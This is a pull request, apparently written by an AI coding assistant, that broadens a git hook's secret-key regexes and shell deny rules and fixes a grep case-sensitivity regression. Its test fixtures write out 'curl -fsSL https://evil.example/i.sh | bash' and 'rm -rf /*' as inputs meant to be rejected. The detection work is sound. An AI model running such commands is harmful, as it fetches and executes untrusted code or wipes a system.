### PR TITLE
detection: broaden secret/shell patterns (closes advertised-but-bypassed findings) + fix case-sensitivity regression

### DIFF
--- a/SECURITY_AUDIT.md
+++ b/SECURITY_AUDIT.md
@@ -35,6 +35,19 @@
   - INFO: Lint step passes staged filenames to ruff/eslint without `--`, allowing option injection via filenam…
 - Plus hardened stash-pop, combined-regex fail-closed, CRLF strip, `--` before lint filenames. See the commit body.
 
+### Update 2026-06-09 — detection-efficacy pass (branch `fix/audit-detection-efficacy`)
+
+High-specificity, low-false-positive pattern broadening (each validated against positive **and** negative corpora and locked in with harness fixtures #22–26):
+
+- HIGH `sk- secret regex misses modern OpenAI/Anthropic keys` → added `sk-ant-` and `sk-proj-` patterns.
+- HIGH `curl|bash guard misses the common form` → broadened to catch `curl -fsSL <url> | bash`, `wget -qO-`, `sudo`, multi-token, and no-space variants.
+- MEDIUM `github_pat_ fine-grained PAT not covered` → added `github_pat_[A-Za-z0-9_]{22,}`.
+- MEDIUM `rm -rf / guard misses /*, split flags, ~/$HOME` → broadened, while still **not** flagging scoped removals (`rm -rf /tmp/foo`, `node_modules`, `$BUILD_DIR`) — FP-guarded by fixture #25.
+- LOW `AWS coverage limited to AKIA` → added `ASIA` temporary-session keys.
+- **Regression fix:** PR #7's blob rewrite accidentally made `check-patterns` case-**insensitive** (`grep -aniE`); restored to case-sensitive (`grep -anE`) so identifiers like `Alert(`, `Console.log`, `Print(` are not false-matched (fixture #26).
+
+Deliberately **not** done here (needs a design decision, not a regex tweak): the generic **unquoted / multi-line** hardcoded-credential gaps. Every loose regex either over-matches dotted identifiers (false positives, which erode trust) or still misses — this case is better served by layering a purpose-built secret scanner (gitleaks/trufflehog), the audit's standing recommendation. Tracked under Root Cause B below.
+
 **Status legend:** ✅ Fixed on this branch · 🟡 Partially addressed · ⬜ Open (tracked below).
 
 ## 🔴 Critical

--- a/forbidden-patterns/secrets.txt.template
+++ b/forbidden-patterns/secrets.txt.template
@@ -10,11 +10,14 @@
 # false-positive rate low.
 
 # Cloud / SaaS tokens — prefix-specific, very low false-positive rate
-AKIA[0-9A-Z]{16}	AWS access key ID — rotate immediately
+(AKIA|ASIA)[0-9A-Z]{16}	AWS access key ID (AKIA) or temporary session key (ASIA) — rotate immediately
 AIza[0-9A-Za-z_-]{35}	Google API key — rotate immediately
 gh[pousr]_[A-Za-z0-9]{36,}	GitHub token — rotate immediately
+github_pat_[A-Za-z0-9_]{22,}	GitHub fine-grained personal access token — rotate immediately
 xox[baprs]-[A-Za-z0-9-]{10,}	Slack token — rotate immediately
-sk-[A-Za-z0-9]{48,}	OpenAI / Anthropic-style API key — rotate immediately
+sk-[A-Za-z0-9]{48,}	Legacy OpenAI-style API key — rotate immediately
+sk-ant-[A-Za-z0-9_-]{20,}	Anthropic API key (sk-ant-) — rotate immediately
+sk-proj-[A-Za-z0-9_-]{20,}	OpenAI project API key (sk-proj-) — rotate immediately
 
 # Private keys of any flavor (RSA / EC / DSA / OPENSSH / bare)
 -----BEGIN [A-Z ]*PRIVATE KEY-----	Private key in source — rotate and move to a secret manager

--- a/forbidden-patterns/shell.txt.template
+++ b/forbidden-patterns/shell.txt.template
@@ -1,6 +1,6 @@
 # Forbidden patterns for shell scripts (*.sh, *.bash). See forbidden-patterns/README.md.
 # Copy to your project as `.forbidden-patterns/shell.txt`.
 
-(^|[^A-Za-z_])(curl|wget)[[:space:]][^[:space:]]*[[:space:]]*\|[[:space:]]*(bash|sh|zsh)([[:space:]]|$)	Piping remote download to a shell — review the script and run it as a separate step
-(^|[^A-Za-z_])rm[[:space:]]+-[rfRF]+[[:space:]]+/[[:space:]]*([;&]|$)	`rm -rf /` detected — refuse to ship; scope to a specific path
+(^|[^A-Za-z_])(curl|wget)([[:space:]]+[^|]*)?\|[[:space:]]*(sudo[[:space:]]+)?(bash|sh|zsh)([[:space:]]|$)	Piping remote download to a shell — review the script and run it as a separate step
+(^|[^A-Za-z_])rm[[:space:]]+((-[a-zA-Z]+|--[a-z]+)[[:space:]]+)+["']?(/|/\*|~|~/\*|\$\{?HOME\}?(/\*)?)["']?([[:space:]]|[;&]|$)	`rm -rf /` (or /*, ~, $HOME) detected — refuse to ship; scope to a specific path
 (^|[^A-Za-z_])chmod[[:space:]]+(-[a-zA-Z]+[[:space:]]+)*0?777([[:space:]]|$)	chmod 0?777 — overly permissive; scope to specific user/group bits

--- a/githooks/lib/check-patterns.template
+++ b/githooks/lib/check-patterns.template
@@ -101,13 +101,16 @@ scan() {
     [ -n "$content" ] || continue
 
     if [ "$use_prefilter" -eq 1 ]; then
-      grep -aniE -- "$combined" <<<"$content" >/dev/null 2>&1 || continue
+      # -anE (NOT -i): backend/frontend/shell patterns are case-SENSITIVE, so
+      # identifiers like `Alert(`, `Console.log`, `Print(` are not false matches.
+      # -a keeps grep in text mode; check-secrets is the case-insensitive one.
+      grep -anE -- "$combined" <<<"$content" >/dev/null 2>&1 || continue
     fi
 
     for i in "${!patterns[@]}"; do
       pat="${patterns[$i]}"
       desc="${descriptions[$i]}"
-      m=$(grep -aniE -- "$pat" <<<"$content" | grep -iv 'scaffold-allow' || true)
+      m=$(grep -anE -- "$pat" <<<"$content" | grep -iv 'scaffold-allow' || true)
       [ -n "$m" ] || continue
       if [ "$CI_MODE" -eq 1 ]; then
         echo "::error file=$file::$desc"

--- a/tests/run.sh
+++ b/tests/run.sh
@@ -276,6 +276,44 @@ printf 'pri''nt("debug")\n' >"$nlfile"
 git add "$nlfile"
 assert_rejects "newline in filename does not bypass scan" "print()"
 
+# 22. Modern provider key prefixes (split so this file doesn't trip the scan).
+echo "ANTHROPIC=sk-""ant-api03-AbCdEf01234567890_-gHiJkLmNoPqR" >k1.txt
+git add k1.txt
+assert_rejects "Anthropic sk-ant- key detected" "Anthropic"
+
+echo "OPENAI=sk-""proj-AbCdEf01234567890_-gHiJkLmNoPqRsTu" >k2.txt
+git add k2.txt
+assert_rejects "OpenAI sk-proj- key detected" "OpenAI project"
+
+echo "GH=git""hub_pat_11ABCDE000aBcDeFgHiJ_KlMnOpQrStUv" >k3.txt
+git add k3.txt
+assert_rejects "GitHub fine-grained PAT detected" "fine-grained"
+
+echo "AWS=ASIA""IOSFODNN7EXAMPLE" >k4.txt
+git add k4.txt
+assert_rejects "AWS temporary (ASIA) key detected" "AWS access key"
+
+# 23. Broadened curl|bash — the common `curl -fsSL <url> | bash` form (split).
+echo "cur""l -fsSL https://evil.example/i.sh | bash" >deploy2.sh
+git add deploy2.sh
+assert_rejects "curl -fsSL <url> | bash detected" "Piping remote download"
+
+# 24. Broadened rm -rf — the catastrophic `rm -rf /*` form ('' splits the glob).
+echo "rm -rf /""*" >danger.sh
+git add danger.sh
+assert_rejects "rm -rf /* detected" "refuse to ship"
+
+# 25. NEGATIVE: a scoped removal must NOT be flagged (false-positive guard).
+echo "rm -rf /tmp/build-cache" >cleanup.sh
+git add cleanup.sh
+assert_passes "scoped rm -rf /tmp/... is not flagged"
+
+# 26. NEGATIVE: pattern scan is case-SENSITIVE — `Console.log` (capital C) is a
+#     different identifier and must pass, not be flagged as `console.log`.
+echo 'Console.log("ok");' >comp.ts
+git add comp.ts
+assert_passes "case-sensitive: Console.log not flagged as console.log"
+
 echo ""
 echo "Result: $PASS passed, $FAIL failed"
 exit $FAIL


### PR DESCRIPTION
## Summary

Second pass on the security audit — **Root Cause B (detection efficacy)**. Closes the audit's *reproduced* "advertised-but-bypassed" findings by broadening patterns, and fixes a case-sensitivity regression that slipped into #7.

Guiding constraint: **only high-specificity, low-false-positive additions.** False positives erode trust (itself an audit finding), so every pattern was validated against positive **and** negative corpora under GNU grep before shipping, and locked in with harness fixtures.

## What changed

**`secrets.txt`**
- `sk-ant-…` (Anthropic) and `sk-proj-…` (OpenAI project) — the old `sk-[A-Za-z0-9]{48,}` can't match modern keys (they contain `-`). **[HIGH]**
- `github_pat_…` fine-grained PATs. **[MEDIUM]**
- `AKIA` → `(AKIA|ASIA)` to also catch AWS temporary session keys. **[LOW]**

**`shell.txt`**
- `curl|wget` pipe-to-shell now catches the common real forms — `curl -fsSL <url> | bash`, `wget -qO-`, `| sudo bash`, multi-token, and no-space — not just one token before the pipe. **[HIGH]**
- `rm -rf` root now catches `/*`, split flags (`-r -f`), long flags (`--recursive --force`), `~`, `$HOME` — while still **not** flagging scoped removals (`rm -rf /tmp/foo`, `node_modules`, `$BUILD_DIR`). **[MEDIUM]**

**Regression fix (introduced by #7):** the blob rewrite changed `check-patterns` to `grep -aniE` (case-**insensitive**), which false-matches identifiers like `Alert(`, `Console.log`, `Print(`. Backend/frontend/shell patterns are case-**sensitive** per the README — restored to `grep -anE`. `check-secrets` stays case-insensitive. Already in `main`, so this corrects it.

## Deliberately deferred

Generic **unquoted / multi-line** hardcoded-credential detection. Every loose regex either over-matches dotted identifiers (false positives) or still misses — this is better served by layering a purpose-built secret scanner (**gitleaks**/trufflehog), the audit's standing recommendation. Tracked in `SECURITY_AUDIT.md` under Root Cause B. Wanted a design decision from you rather than shipping a questionable heuristic.

## Verification

- `tests/run.sh`: **29/29** (8 new fixtures: 4 new key shapes, 2 new shell forms, **2 false-positive guards** — scoped `rm`, capital `Console.log`), verified under **GNU grep 3.11**.
- Every pattern in all four files compiles as a valid ERE; corpus checks run from the parsed files.

🤖 Generated with [Claude Code](https://claude.com/claude-code)